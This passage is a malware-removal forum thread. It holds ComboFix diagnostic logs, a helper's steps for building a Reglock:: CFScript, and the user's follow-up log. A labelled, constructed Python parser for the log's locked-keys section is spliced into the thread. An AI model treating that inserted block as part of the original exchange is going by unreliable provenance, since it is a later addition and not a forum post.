@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0003\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0004\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0005\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0006\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
Completion time: 2014-03-11 14:48:18
ComboFix-quarantined-files.txt 2014-03-11 03:48
ComboFix2.txt 2014-03-11 02:35
ComboFix3.txt 2014-03-11 02:07
.
Pre-Run: 36,797,087,744 bytes free
Post-Run: 36,727,373,824 bytes free
.
- - End Of File - - 347AD25622ED86437AA5DB38C81462D3
A36C5E4F47E84449FF07ED3517B43A31

Is there a continuing problem, for I cannot find those locked registry keys...

ta very muchly.
 
What do you mean by scripts are following you?

1. Go to Start > Run > type Notepad.exe and click OK to open Notepad.
It must be Notepad, not Wordpad.
2. Copy the text in the below code box

Code:
Reglock::

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0002\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0003\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0004\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0005\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0006\AllUserSettings]


3. Go to the Notepad window and click Edit > Paste
4. Then click File > Save
5. Name the file CFScript.txt - Save the file to your Desktop
6. Then drag the CFScript (hold the left mouse button while dragging the file) and drop it (release the left mouse button) into ComboFix.exe as you see in the screenshot below. Important: Perform this instruction carefully!

[Screenshot: CFScript-1.gif]

ComboFix will begin to execute, just follow the prompts.
After reboot (in case it asks to reboot), it will produce a log for you.
Post that log (Combofix.txt) in your next reply.
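An added example, not from this thread or from ComboFix's authors: it parses the LOCKED REGISTRY KEYS section of a ComboFix log in the layout shown above, reports which principals are denied or allowed on each key, and emits the same Reglock:: CFScript body the instructions ask for. The log excerpt is constructed from the thread's log; the GUID-to-class mapping covers only the modem setup class GUID that appears in it.

```python
"""Parse the LOCKED REGISTRY KEYS section of a ComboFix log (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two keys from the thread's log, in ComboFix's own layout.
SAMPLE_LOG = r"""
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:61,9a,4c,64,7b,f9,ce,01
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
Completion time: 2014-03-11 14:48:18
"""

SECTION_HEADER = "LOCKED REGISTRY KEYS"
KEY_RE = re.compile(r"^\[(.+)\]$")
ACL_RE = re.compile(r"^@(Denied|Allowed): \(([^)]*)\) \(([^)]*)\)$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')
CLASS_GUID_RE = re.compile(r"\\Control\\Class\\(\{[0-9A-Fa-f-]{36}\})\\", re.IGNORECASE)

# Windows device setup class GUIDs we recognise; only the one from the log.
KNOWN_CLASS_GUIDS = {
    "{4D36E96D-E325-11CE-BFC1-08002BE10318}": "Modem",
}


@dataclass
class LockedKey:
    path: str
    denied: List[str] = field(default_factory=list)   # principals with @Denied
    allowed: List[str] = field(default_factory=list)  # principals with @Allowed
    values: Dict[str, str] = field(default_factory=dict)

    def device_class(self) -> Optional[str]:
        """Name the device setup class if the key lives under Control\\Class."""
        m = CLASS_GUID_RE.search(self.path)
        if not m:
            return None
        guid = m.group(1).upper()
        return KNOWN_CLASS_GUIDS.get(guid, "unknown class " + guid)


def parse_locked_keys(log_text: str) -> List[LockedKey]:
    """Return every key listed between the section header and the completion stamp."""
    keys: List[LockedKey] = []
    current: Optional[LockedKey] = None
    in_section = False
    for raw in log_text.splitlines():
        line = raw.strip()
        if not in_section:
            in_section = SECTION_HEADER in line
            continue
        # The section ends at the completion stamp or the next dashed header.
        if line.startswith("Completion time:") or line.startswith("---"):
            break
        m = KEY_RE.match(line)
        if m:
            current = LockedKey(path=m.group(1))
            keys.append(current)
            continue
        if current is None:
            continue
        m = ACL_RE.match(line)
        if m:
            bucket = current.denied if m.group(1) == "Denied" else current.allowed
            bucket.append(m.group(3))
            continue
        m = VALUE_RE.match(line)
        if m:  # hex continuation lines have no leading quote and are skipped
            current.values[m.group(1)] = m.group(2)
    return keys


def build_reglock_script(keys: List[LockedKey]) -> str:
    """Emit a CFScript body in the Reglock:: form used in the reply above."""
    lines = ["Reglock::", ""] + ["[%s]" % k.path for k in keys]
    return "\n".join(lines) + "\n"


def summarize(keys: List[LockedKey]) -> List[str]:
    """One line per key: who is denied, who is allowed, and the device class."""
    return [
        "%s | denied=%s | allowed=%s | class=%s"
        % (k.path, ",".join(k.denied) or "-", ",".join(k.allowed) or "-",
           k.device_class() or "-")
        for k in keys
    ]


if __name__ == "__main__":
    found = parse_locked_keys(SAMPLE_LOG)
    print("\n".join(summarize(found)))
    print(build_reglock_script(found))
```

Pointing the parser at a full ComboFix.txt instead of the constructed sample gives the same summary for the real log.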
 
Have run CFScript.txt

Hi Johnb35,

Many thanks for your guidance here.

I have run CFScript.txt as advised by you above.
Here is the log from that run:

ComboFix 14-03-10.01 - Chris 12/03/2014 8:18.4.2 - x86
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.61.1033.18.3070.1984 [GMT 11:00]
Running from: c:\users\Chris\Downloads\1-secure\ComboFix.exe
Command switches used :: c:\users\Chris\Downloads\1-secure\CFScript.txt
AV: Symantec Endpoint Protection *Disabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
FW: Symantec Endpoint Protection *Disabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
SP: Symantec Endpoint Protection *Disabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2014-02-11 to 2014-03-11 )))))))))))))))))))))))))))))))
.
.
2014-03-11 21:26 . 2014-03-11 21:26 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp
2014-03-11 21:26 . 2014-03-11 21:26 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-03-11 01:59 . 2014-03-11 21:26 -------- d-----w- c:\users\Chris\AppData\Local\temp
2014-03-11 00:06 . 2014-03-11 00:20 -------- d-----w- c:\program files\WhatsRunning
2014-03-10 23:51 . 2014-03-10 23:51 -------- d--h--w- c:\windows\PIF
2014-03-10 22:57 . 2014-03-10 23:04 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-03-10 22:56 . 2014-03-10 22:56 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\users\Chris\AppData\Roaming\Malwarebytes
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\programdata\Malwarebytes
2014-03-10 22:38 . 2013-04-04 03:50 22856 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-03-09 09:27 . 2014-03-09 09:27 -------- d-----w- c:\users\Chris\AppData\Local\Symantec
2014-03-09 09:12 . 2014-03-09 09:28 -------- d-----w- c:\program files\Common Files\Symantec Shared
2014-03-09 09:12 . 2014-03-09 09:12 142936 ----a-w- c:\windows\system32\drivers\SYMEVENT.SYS
2014-03-09 09:10 . 2014-03-09 09:10 420752 ----a-w- c:\windows\system32\SymVPN.dll
2014-03-09 09:10 . 2014-03-09 09:10 33264 ----a-w- c:\windows\system32\drivers\WGX.SYS
2014-03-09 09:10 . 2014-03-09 09:10 136080 ----a-w- c:\windows\system32\FwsVpn.dll
2014-03-09 09:10 . 2014-03-09 09:10 361360 ----a-w- c:\windows\system32\sysfer.dll
2014-03-09 09:10 . 2014-03-09 09:10 126440 ----a-w- c:\windows\system32\drivers\SysPlant.sys
2014-03-09 09:10 . 2014-03-09 09:10 11152 ----a-w- c:\windows\system32\sysferThunk.dll
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\programdata\regid.1992-12.com.symantec
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\windows\system32\drivers\SEP
2014-03-09 09:10 . 2014-03-11 21:05 -------- d-----w- c:\programdata\Symantec
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\program files\Symantec
2014-02-20 20:29 . 2014-02-20 20:31 -------- d-----w- c:\programdata\WinZip
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-11 20:56 . 2012-03-29 19:34 692616 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-03-11 20:56 . 2011-05-17 23:08 71048 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-03-11 20:31 . 2010-02-13 22:24 16608 ----a-w- c:\windows\gdrv.sys
2014-01-19 02:39 . 2014-01-19 02:39 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-01-19 02:39 . 2014-01-19 02:39 645120 ----a-w- c:\windows\system32\jsIntl.dll
2014-01-19 02:39 . 2014-01-19 02:39 194048 ----a-w- c:\windows\system32\elshyph.dll
2014-01-19 02:39 . 2014-01-19 02:39 71680 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe
2014-01-19 02:39 . 2014-01-19 02:39 62464 ----a-w- c:\windows\system32\tdc.ocx
2014-01-19 02:39 . 2014-01-19 02:39 34816 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-01-19 02:39 . 2014-01-19 02:39 337408 ----a-w- c:\windows\system32\html.iec
2014-01-19 02:39 . 2014-01-19 02:39 182272 ----a-w- c:\windows\system32\msls31.dll
2014-01-19 02:39 . 2014-01-19 02:39 1818112 ----a-w- c:\windows\system32\wininet.dll
2014-01-19 02:39 . 2014-01-19 02:39 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-01-19 02:39 . 2014-01-19 02:39 1051136 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-01-19 02:39 . 2014-01-19 02:39 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-01-19 02:39 . 2014-01-19 02:39 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-01-19 02:39 . 2014-01-19 02:39 24576 ----a-w- c:\windows\system32\licmgr10.dll
2014-01-19 02:39 . 2014-01-19 02:39 1926656 ----a-w- c:\windows\system32\inetcpl.cpl
2014-01-19 02:39 . 2014-01-19 02:39 151552 ----a-w- c:\windows\system32\iexpress.exe
2014-01-19 02:39 . 2014-01-19 02:39 139264 ----a-w- c:\windows\system32\wextract.exe
2014-01-19 02:39 . 2014-01-19 02:39 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-01-19 02:39 . 2014-01-19 02:39 86016 ----a-w- c:\windows\system32\iesysprep.dll
2014-01-19 02:39 . 2014-01-19 02:39 74240 ----a-w- c:\windows\system32\SetIEInstalledDate.exe
2014-01-19 02:39 . 2014-01-19 02:39 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-01-19 02:39 . 2014-01-19 02:39 553472 ----a-w- c:\windows\system32\jscript9diag.dll
2014-01-19 02:39 . 2014-01-19 02:39 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-01-19 02:39 . 2014-01-19 02:39 48640 ----a-w- c:\windows\system32\mshtmler.dll
2014-01-19 02:39 . 2014-01-19 02:39 4240384 ----a-w- c:\windows\system32\jscript9.dll
2014-01-19 02:39 . 2014-01-19 02:39 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-01-19 02:39 . 2014-01-19 02:39 36352 ----a-w- c:\windows\system32\imgutil.dll
2014-01-19 02:39 . 2014-01-19 02:39 13312 ----a-w- c:\windows\system32\mshta.exe
2014-01-19 02:39 . 2014-01-19 02:39 111616 ----a-w- c:\windows\system32\IEAdvpack.dll
2014-01-19 02:39 . 2014-01-19 02:39 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-01-19 02:39 . 2014-01-19 02:39 69632 ----a-w- c:\windows\system32\smss.exe
2014-01-19 02:39 . 2014-01-19 02:39 640512 ----a-w- c:\windows\system32\advapi32.dll
2014-01-19 02:39 . 2014-01-19 02:39 619520 ----a-w- c:\windows\system32\tdh.dll
2014-01-19 02:39 . 2014-01-19 02:39 3969472 ----a-w- c:\windows\system32\ntkrnlpa.exe
2014-01-19 02:39 . 2014-01-19 02:39 3914176 ----a-w- c:\windows\system32\ntoskrnl.exe
2014-01-19 02:39 . 2014-01-19 02:39 38912 ----a-w- c:\windows\system32\csrsrv.dll
2014-01-19 02:39 . 2014-01-19 02:39 1289096 ----a-w- c:\windows\system32\ntdll.dll
2014-01-19 02:39 . 2014-01-19 02:39 338944 ----a-w- c:\windows\system32\drivers\afd.sys
2014-01-19 02:39 . 2014-01-19 02:39 240496 ----a-w- c:\windows\system32\drivers\netio.sys
2014-01-19 02:39 . 2014-01-19 02:39 231424 ----a-w- c:\windows\system32\mswsock.dll
2014-01-19 02:39 . 2014-01-19 02:39 187752 ----a-w- c:\windows\system32\drivers\FWPKCLNT.SYS
2014-01-19 02:39 . 2014-01-19 02:39 1294272 ----a-w- c:\windows\system32\drivers\tcpip.sys
2014-01-19 02:38 . 2014-01-19 02:38 49152 ----a-w- c:\windows\system32\taskhost.exe
2014-01-19 02:38 . 2014-01-19 02:38 6144 ---ha-w- c:\windows\system32\api-ms-win-security-base-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 5120 ---ha-w- c:\windows\system32\api-ms-win-core-file-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4608 ---ha-w- c:\windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4608 ---ha-w- c:\windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-synch-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-misc-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-localization-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-memory-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-heap-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-util-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-string-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-profile-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-io-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-handle-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-debug-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-console-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 293376 ----a-w- c:\windows\system32\KernelBase.dll
2014-01-19 02:38 . 2014-01-19 02:38 271360 ----a-w- c:\windows\system32\conhost.exe
2014-01-19 02:38 . 2014-01-19 02:38 169984 ----a-w- c:\windows\system32\winsrv.dll
2014-01-19 02:37 . 2014-01-19 02:37 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 906240 ----a-w- c:\windows\system32\FntCache.dll
2014-01-19 02:37 . 2014-01-19 02:37 604160 ----a-w- c:\windows\system32\d3d10level9.dll
2014-01-19 02:37 . 2014-01-19 02:37 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-01-19 02:37 . 2014-01-19 02:37 4096 ---ha-w- c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 364544 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2014-01-19 02:37 . 2014-01-19 02:37 3584 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-01-19 02:37 . 2014-01-19 02:37 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 293376 ----a-w- c:\windows\system32\dxgi.dll
2014-01-19 02:37 . 2014-01-19 02:37 2560 ---ha-w- c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 249856 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-01-19 02:37 . 2014-01-19 02:37 2284544 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-01-19 02:37 . 2014-01-19 02:37 220160 ----a-w- c:\windows\system32\d3d10core.dll
2014-01-19 02:37 . 2014-01-19 02:37 207872 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2014-01-19 02:37 . 2014-01-19 02:37 1988096 ----a-w- c:\windows\system32\d3d10warp.dll
2014-01-19 02:37 . 2014-01-19 02:37 187392 ----a-w- c:\windows\system32\UIAnimation.dll
2014-01-19 02:37 . 2014-01-19 02:37 161792 ----a-w- c:\windows\system32\d3d10_1.dll
2014-01-19 02:37 . 2014-01-19 02:37 1247744 ----a-w- c:\windows\system32\DWrite.dll
2014-01-19 02:37 . 2014-01-19 02:37 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2010-11-20 1174016]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2010-03-17 8546848]
"snpstd"="c:\windows\vsnpstd.exe" [2003-12-30 40960]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2011-11-01 59240]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"LWS"="c:\program files\Logitech\LWS\Webcam Software\LWS.exe" [2011-11-11 205336]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2012-09-07 296096]
"Dell V310-V510 Series Fax Server"="c:\program files\Dell V310-V510 Series\fm3032.exe" [2009-12-30 311296]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2013-07-01 254336]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Adobe Gamma Loader.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2010-2-14 113664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"mixer7"=wdmaud.drv
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Flowkeeper.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Flowkeeper.lnk
backup=c:\windows\pss\Flowkeeper.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^hpoddt01.exe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\hpoddt01.exe.lnk
backup=c:\windows\pss\hpoddt01.exe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]
2012-07-01 12:20 116648 ----atw- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Logitech Vid]
2010-05-11 06:43 6061400 ----a-w- c:\program files\Logitech\Vid\Vid.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Logitech Vid HD]
2010-05-11 06:43 6061400 ----a-w- c:\program files\Logitech\Vid\Vid.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2012-09-07 02:30 296096 ----a-w- c:\program files\Real\RealPlayer\Update\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
R2 dleaCATSCustConnectService;dleaCATSCustConnectService;c:\windows\system32\spool\DRIVERS\W32X86\3\\dleaserv.exe [2009-07-01 98984]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [2013-04-04 701512]
R2 SkypeUpdate;Skype Updater;c:\program files\Skype\Updater\Updater.exe [2013-09-04 171680]
R2 WCMVCAM;WebcamMax, WDM Video Capture;c:\windows\system32\DRIVERS\wcmvcam.sys [2011-06-23 1068216]
R3 ewusbnet;HUAWEI USB-NDIS miniport;c:\windows\system32\DRIVERS\ewusbnet.sys [2009-10-21 198656]
R3 hwusbdev;Huawei DataCard USB PNP Device;c:\windows\system32\DRIVERS\ewusbdev.sys [2009-10-12 101120]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-01-19 108032]
R3 PACSPTISVR-Sound_Organizer;PACSPTISVR-Sound_Organizer;c:\program files\Sony\Sound Organizer\Sony.Earth\PACSPTISVR.exe [2012-11-07 174176]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2010-11-20 15872]
R3 SyDvCtrl;SyDvCtrl;c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\SyDvCtrl32.sys [2013-10-21 28576]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2010-09-01 1343400]
S0 SymDS;Symantec Data Store;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMDS.SYS [2013-10-21 367704]
S0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMEFA.SYS [2013-10-21 935512]
S1 BHDrvx86;BHDrvx86;c:\programdata\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Data\Definitions\BASHDefs\20140304.011\BHDrvx86.sys [2014-03-03 1098968]
S1 ccSettings_{974A0163-23BB-4C9D-A3C2-611667F7A450};Symantec Endpoint Protection 12.1.4013.4013.105 Settings Manager;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\ccSetx86.sys [2013-10-21 134744]
S1 IDSVix86;IDSVix86;c:\programdata\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Data\Definitions\IPSDefs\20140309.011\IDSvix86.sys [2014-03-07 394456]
S1 SymIRON;Symantec Iron Driver;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\Ironx86.SYS [2013-10-21 175192]
S1 SYMNETS;Symantec Network Security WFP Driver;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMNETS.SYS [2013-10-21 341080]
S2 dlea_device;dlea_device;c:\windows\system32\dleacoms.exe [2009-07-01 602792]
S2 DragonSvc;Dragon Service;c:\program files\Common Files\Nuance\dgnsvc.exe [2012-07-18 310232]
S2 GEST Service;GEST Service for program management.;c:\program files\GIGABYTE\EnergySaver\GSvr.exe [2008-09-24 68136]
S2 MBAMScheduler;MBAMScheduler;c:\program files\Malwarebytes' Anti-Malware\mbamscheduler.exe [2013-04-04 418376]
S2 SepMasterService;Symantec Endpoint Protection;c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\ccSvcHst.exe [2013-10-21 144368]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2012-12-28 383416]
S2 UMVPFSrv;UMVPFSrv;c:\program files\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [2012-01-18 450848]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2014-02-17 108120]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-04-04 22856]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt86win7.sys [2009-07-13 139776]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
.
Contents of the 'Scheduled Tasks' folder
.
